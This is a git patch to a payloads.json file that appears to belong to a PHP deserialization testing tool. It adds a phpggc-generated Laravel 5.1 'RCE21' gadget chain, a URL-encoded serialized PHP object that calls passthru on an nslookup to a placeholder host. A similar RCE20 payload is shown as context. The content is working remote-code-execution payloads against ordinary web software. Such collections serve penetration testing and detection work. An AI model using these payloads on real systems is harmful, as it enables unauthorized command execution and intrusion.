From ffaf6e9f349cb1a70e7fedeae550a7144d88e8ca Mon Sep 17 00:00:00 2001
From: Ricardo <ricardojba@users.noreply.github.com>
Date: Sun, 8 Sep 2024 13:53:45 +0100
Subject: [PATCH] Update payloads.json

Add Laravel RCE 21
---
 res/payloads.json | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/res/payloads.json b/res/payloads.json
index b8752b3..e1a1a9e 100644
--- a/res/payloads.json
+++ b/res/payloads.json
@@ -209,6 +209,12 @@
     "gen_with": "./phpggc Laravel/RCE20 <function> <parameter>",
     "payload": "O:46:\"Illuminate\\Routing\\PendingResourceRegistration\":3:{s:12:\"%00*%00registrar\"%3BO:36:\"Illuminate\\Routing\\ResourceRegistrar\":1:{s:9:\"%00*%00router\"%3BN%3B}s:7:\"%00*%00name\"%3BO:38:\"Illuminate\\Validation\\Rules\\RequiredIf\":1:{s:9:\"condition\"%3Ba:2:{i:0%3BO:28:\"Illuminate\\Auth\\RequestGuard\":3:{s:11:\"%00*%00callback\"%3Bs:8:\"passthru\"%3Bs:10:\"%00*%00request\"%3Bs:63:\"nslookup+CHANGEME\"%3Bs:11:\"%00*%00provider\"%3Bi:1%3B}i:1%3Bs:4:\"user\"%3B}}s:13:\"%00*%00registered\"%3Bb:0%3B}"
   },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Laravel 5.1.* (21)",
+    "gen_with": "./phpggc Laravel/RCE21 <function> <parameter>",
+    "payload": "O:27:\"Swift_KeyCache_DiskKeyCache\":2:{s:34:\"%00Swift_KeyCache_DiskKeyCache%00_keys\"%3Ba:1:{s:12:\"fallingskies\"%3Ba:1:{s:12:\"fallingskies\"%3Bs:12:\"fallingskies\"%3B}}s:34:\"%00Swift_KeyCache_DiskKeyCache%00_path\"%3BO:36:\"Mockery\\Generator\\DefinedTargetClass\":1:{s:41:\"%00Mockery\\Generator\\DefinedTargetClass%00rfc\"%3BO:20:\"Faker\\ValidGenerator\":3:{s:12:\"%00*%00generator\"%3BO:22:\"Faker\\DefaultGenerator\":1:{s:10:\"%00*%00default\"%3Bs:63:\"nslookup%20CHANGEME\"%3B}s:12:\"%00*%00validator\"%3Bs:8:\"passthru\"%3Bs:13:\"%00*%00maxRetries\"%3Bi:9%3B}}}"
+  },
   {
     "_needs_dynamic_payload_editing": false,
     "name": "Monolog 1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+ (1)",